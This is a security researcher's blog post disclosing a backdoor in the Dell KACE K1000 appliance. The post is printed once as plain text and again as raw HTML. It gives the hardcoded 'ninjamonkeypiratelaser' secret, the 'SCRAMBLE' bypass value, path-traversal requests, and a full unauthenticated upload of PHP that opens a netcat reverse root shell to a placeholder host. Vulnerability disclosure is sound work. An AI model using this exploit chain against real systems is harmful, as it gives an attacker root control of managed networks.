The curious case of the ninjamonkeypiratelaser backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance (“http://www.kace.com/products/systems-management-appliance”). I’m not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren’t working on a patch for this – they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:

POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8”..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini ;
;;;;;;;;;;;;;;;;;;;

That bug is neat, but its post-auth and can’t be used for RCE because it returns the file as an attachment 🙁

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named “kbot_upload.php”. This file is located on the appliance at the following location:

http://targethost/service/kbot_upload.php

This script includes “KBotUpload.class.php” and then calls “KBotUpload::HandlePUT()”, it does not check for a valid session and utilizes its own “special” means to auth the request.

The “HandlePut()” function contains the following calls:

$checksumFn = $_GET[‘filename’];
$fn = rawurldecode($_GET[‘filename’]);
$machineId = $_GET[‘machineId’];
$checksum = $_GET[‘checksum’];
$mac = $_GET[‘mac’];
$kbotId = $_GET[‘kbotId’];
$version = $_GET[‘version’];
$patchScheduleId = $_GET[‘patchscheduleid’];
if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != “SCRAMBLE”) {
KBLog($_SERVER[“REMOTE_ADDR”] . ” token checksum did not match, “
.”($machineId, $checksumFn, $mac)”);
KBLog($_SERVER[‘REMOTE_ADDR’] . ” returning 500 “
.”from HandlePUT(“.construct_url($_GET).”)”);
header(“Status: 500”, true, 500);
return;
}

The server checks to ensure that the request is authorized by inspecting the “checksum” variable that is part of the server request. This “checksum” variable is created by the client using the following:

md5(“$filename $machineId $mac” . ‘ninjamonkeypiratelaser#[@g3rnboawi9e9ff’);

Server side check:

private static function calcTokenChecksum($filename, $machineId, $mac)
{
//return md5(“$filename $machineId $mac” . $ip .
// ‘ninjamonkeypiratelaser#[@g3rnboawi9e9ff’);

// our tracking of ips really sucks and when I’m vpn’ed from
// home I couldn’t get patching to work, cause the ip that
// was on the machine record was different from the
// remote server ip.
return md5(“$filename $machineId $mac” .
‘ninjamonkeypiratelaser#[@g3rnboawi9e9ff‘);
}

The “secret” value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server.

In addition to this “calcTokenChecksum” check, there is a hardcoded value of “SCRAMBLE” that can be provided by the attacker that will bypass the auth check (backdoor++;):

if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != “SCRAMBLE“) {

Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the “www” user (boooooo). The “www” user has permission to write to the directory “/kbox/kboxwww/tmp”, time to escalate to something more useful 🙂

From our new home in “tmp” with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC (“KSudoClient.class.php”).

The “KSudoClient.class.php” can be used to execute commands as root, specifically the function “RunCommandWait”. The following application call utilizes everything that was outlined above and sets up a reverse root shell, “REMOTEHOST” would be replaced with the host we want the server to connect back to:

POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 190
<?php
require_once ‘KSudoClient.class.php’;
KSudoClient::RunCommandWait(“rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f”);?>

Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:

http://targethost/service/tmp/db.php

On our host:

~$ ncat -lkvp 4444
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from XX.XX.XX.XX
sh: can’t access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)

So at the end of the the day the count looks like this:

Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1

That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:

Print Share Comment Cite Upload Translate

APA

() » The curious case of the ninjamonkeypiratelaser backdoor. Retrieved from https://www.truth.cx/2014/03/07/the-curious-case-of-the-ninjamonkeypiratelaser-backdoor/.

MLA

" » The curious case of the ninjamonkeypiratelaser backdoor." - , https://www.truth.cx/2014/03/07/the-curious-case-of-the-ninjamonkeypiratelaser-backdoor/

HARVARD

» The curious case of the ninjamonkeypiratelaser backdoor., viewed ,

VANCOUVER

- » The curious case of the ninjamonkeypiratelaser backdoor. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2014/03/07/the-curious-case-of-the-ninjamonkeypiratelaser-backdoor/

CHICAGO

" » The curious case of the ninjamonkeypiratelaser backdoor." - Accessed . https://www.truth.cx/2014/03/07/the-curious-case-of-the-ninjamonkeypiratelaser-backdoor/

IEEE

" » The curious case of the ninjamonkeypiratelaser backdoor." [Online]. Available: https://www.truth.cx/2014/03/07/the-curious-case-of-the-ninjamonkeypiratelaser-backdoor/. [Accessed: ]

Select a language:

<div class="tr_bq">A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.</div><div class="tr_bq"><br /></div><div class="tr_bq">Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:</div><blockquote>POST /userui/downloadpxy.php HTTP/1.1<br />User-Agent: Mozilla/5.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx<br />Connection: keep-alive<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 114<br />DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 04 Feb 2014 21:38:39 GMT<br />Server: Apache<br />Expires: 0<br />Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform<br />Pragma: public<br />Content-Length: 47071<br />Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini<br />X-DellKACE-Appliance: k1000<br />X-DellKACE-Version: 5.5.90545<br />X-KBOX-Version: 5.5.90545<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: application/ini<br />[PHP]<br />;;;;;;;;;;;;;;;;;;;<br />; About php.ini   ;<br />;;;;;;;;;;;;;;;;;;;</blockquote>That bug is neat, but its post-auth and can’t be used for RCE because it returns the file as an attachment :( <br /><br /><div class="p1">So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named “kbot_upload.php”. This file is located on the appliance at the following location:</div><blockquote class="tr_bq"><span class="s1"><a href="http://targethost/service/kbot_upload.php">http://targethost/service/kbot_upload.php</a></span></blockquote><div class="p1">This script includes “KBotUpload.class.php” and then calls “KBotUpload::HandlePUT()”, it does not check for a valid session and utilizes its own “special” means to auth the request.</div><div class="p2"><br /></div><div class="p1">The "HandlePut()" function contains the following calls:</div><div class="p2"><br /></div><blockquote class="tr_bq">        $checksumFn = $_GET['filename'];<br />        $fn = rawurldecode($_GET['filename']);<br />        $machineId = $_GET['machineId'];<br />        $checksum = $_GET['checksum'];<br />        $mac = $_GET['mac'];<br />        $kbotId = $_GET['kbotId'];<br />        $version = $_GET['version'];<br />        $patchScheduleId = $_GET['patchscheduleid'];<br />        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {<br />            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "<br />                  ."($machineId, $checksumFn, $mac)");<br />            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "<br />                  ."from HandlePUT(".construct_url($_GET).")");<br />            header("Status: 500", true, 500);<br />            return;<br />        }</blockquote><div class="p2"><br /></div>The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following: <br /><br /><blockquote class="tr_bq">      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');</blockquote><br /><div class="p1">Server side check:</div><blockquote class="tr_bq">    private static function calcTokenChecksum($filename, $machineId, $mac)<br />    {<br />        //return md5("$filename $machineId $mac" . $ip .<br />        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');<br />      <br />        // our tracking of ips really sucks and when I'm vpn'ed from<br />        // home I couldn't get patching to work, cause the ip that<br />        // was on the machine record was different from the<br />        // remote server ip.<br />        return md5("$filename $machineId $mac" .<br />                   '<b>ninjamonkeypiratelaser#[@g3rnboawi9e9ff</b>');<br />    }</blockquote><div class="p1">The "secret" value is hardcoded into the application and cannot be changed by the end user (<b>backdoor++;</b>). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. </div><div class="p1"><br /></div><div class="p1">In addition to this “calcTokenChecksum<b>” </b>check, there is a hardcoded value of "<b>SCRAMBLE</b>" that can be provided by the attacker that will bypass the auth check (<b>backdoor++;</b>):  </div><div class="p1"></div><blockquote class="tr_bq"> if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "<span class="s1"><b><u>SCRAMBLE</u></b></span>") {</blockquote><div class="p1">Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www” user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp”, time to escalate to something more useful :)</div><div class="p1"><br /></div><div class="p1">From our new home in “tmp” with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC (“KSudoClient.class.php”).</div><div class="p2"><br /></div><br /><div class="p1">The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:</div><blockquote class="tr_bq">    POST /service/kbot_upload.php?filename=<span class="s1"><b>db.php</b></span>&machineId=<span class="s1"><b>../../../kboxwww/tmp/</b></span>&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1<br />    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />    Accept-Language: en-US,en;q=0.5<br />    Accept-Encoding: gzip, deflate<br />    Connection: keep-alive<br />    Content-Length: 190<br />    <?php<br />    require_once 'KSudoClient.class.php';<br />    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> </blockquote>Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:<br /><blockquote class="tr_bq"><span class="s1"><b>    </b><a href="http://targethost/service/tmp/db.php"><span class="s2">http://targethost/service/tmp/db.php</span></a></span></blockquote><div class="p1">On our host:</div><blockquote class="tr_bq">    ~$ ncat -lkvp 4444<br />    Ncat: Version 5.21 ( <a href="http://nmap.org/ncat"><span class="s1">http://nmap.org/ncat</span></a> )<br />    Ncat: Listening on 0.0.0.0:4444<br />    Ncat: Connection from XX.XX.XX.XX<br />    sh: can't access tty; job control turned off<br />    # id<br />    uid=0(root) gid=0(wheel) groups=0(wheel)  </blockquote><br />So at the end of the the day the count looks like this:<br /><blockquote class="tr_bq">Directory Traversals: 2<br />Backdoors: 2<br />Privilege Escalation: 1</blockquote>That all adds up to owned last time I checked.<br /><br />Example PoC can be found at the following location:<br /><a href="https://github.com/steponequit/kaced/blob/master/kaced.py">https://github.com/steponequit/kaced/blob/master/kaced.py</a><br /><br />Example usage can be seen below:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-2wZFGEe8Ffw/UxlN9wu1M3I/AAAAAAAABCw/nm4zlWDAlDs/s1600/poc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-2wZFGEe8Ffw/UxlN9wu1M3I/AAAAAAAABCw/nm4zlWDAlDs/s1600/poc.png" height="507" width="640" /></a></div><br /><div class="p1"></div><br />

First name:

Last name:

Related Posts